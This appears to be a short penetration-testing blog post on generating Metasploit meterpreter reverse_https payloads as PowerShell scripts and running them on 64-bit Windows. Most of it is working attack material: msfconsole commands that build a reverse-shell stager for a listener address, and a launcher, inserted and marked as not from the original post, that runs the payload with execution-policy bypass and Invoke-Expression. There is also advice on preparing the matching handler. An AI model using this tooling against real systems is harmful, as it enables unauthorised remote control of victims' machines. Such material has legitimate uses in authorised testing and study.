![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgE2wYIFPeQo3Cg7kE6FRCP9u0AmKH5Ihit_teDn4AD2JXaNeAFQSERG5TQ0HGSSLtRloxWS7gDZTtN8x0CxzmXOzAgONi2FBJ5UbytHRyItbqaFNFoOfpylHiTWMKyv4USVECt4bSbQ-A/s200/ps.jpg)
Quick post, since I mentioned it in the DerbyCon talk: Metasploit can generate its payloads directly as PowerShell scripts, in two flavours, a plain PowerShell version (`-t psh`) and a PowerShell .NET version (`-t psh-net`, which looks related to this). From a payload module in msfconsole it looks like this:
```
msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf payload(reverse_https) > set LPORT 443
LPORT => 443
msf payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf payload(reverse_https) >
```
The psh format is generated from old PowerSploit code (linked here). Also, the 64-bit issue I mentioned here still applies: the script injects the shellcode into the PowerShell process that runs it, and `windows/meterpreter/reverse_https` is a 32-bit payload, so on x64 Windows you must run it with the 32-bit PowerShell host in SysWOW64 (`C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`), not the default 64-bit one in System32.
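An added example of how to handle that bitness check (my own launcher, not code from the original post or from Metasploit; the script path `C:\tmp\https-pwrshell.txt` is an assumption, and the generated script is simply the file written by the `generate` command above):

```powershell
# Added example, not part of the original post: run a Metasploit-generated
# PowerShell payload (the psh format) from the 32-bit PowerShell host, so the
# 32-bit windows/meterpreter stager is injected into a 32-bit process.
# Assumption: the output of "generate -t psh -f https-pwrshell.txt" was
# copied to the target as C:\tmp\https-pwrshell.txt.
$ScriptPath = 'C:\tmp\https-pwrshell.txt'

# [IntPtr]::Size is 8 inside a 64-bit process and 4 inside a 32-bit one.
# Checking the current process is more reliable than looking at the OS,
# because a 32-bit process on x64 sees System32 redirected to SysWOW64
# by the file system redirector and would otherwise "find" itself.
if ([IntPtr]::Size -eq 8) {
    # 64-bit host: hand the script to the WOW64 (32-bit) powershell.exe.
    $Ps32 = Join-Path $env:windir 'SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
    if (-not (Test-Path $Ps32)) {
        throw "32-bit PowerShell host not found at $Ps32"
    }
    # The generated file is .txt, so -File will not accept it; read it and
    # evaluate it with Invoke-Expression in the 32-bit child instead.
    & $Ps32 -NoProfile -ExecutionPolicy Bypass -Command `
        "Invoke-Expression ([IO.File]::ReadAllText('$ScriptPath'))"
} else {
    # Already a 32-bit process (32-bit PowerShell on x64, or a 32-bit OS):
    # the stager can run in this process directly.
    Invoke-Expression ([IO.File]::ReadAllText($ScriptPath))
}
```

Two practical notes: the generated script is only the stager, so a matching `exploit/multi/handler` with the same payload, LHOST and LPORT must already be listening before you run it; and if you ever need the opposite direction (reach the 64-bit host from a 32-bit process), the un-redirected path is `$env:windir\Sysnative\WindowsPowerShell\v1.0\powershell.exe`.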
PowerShell version
PowerShell .net version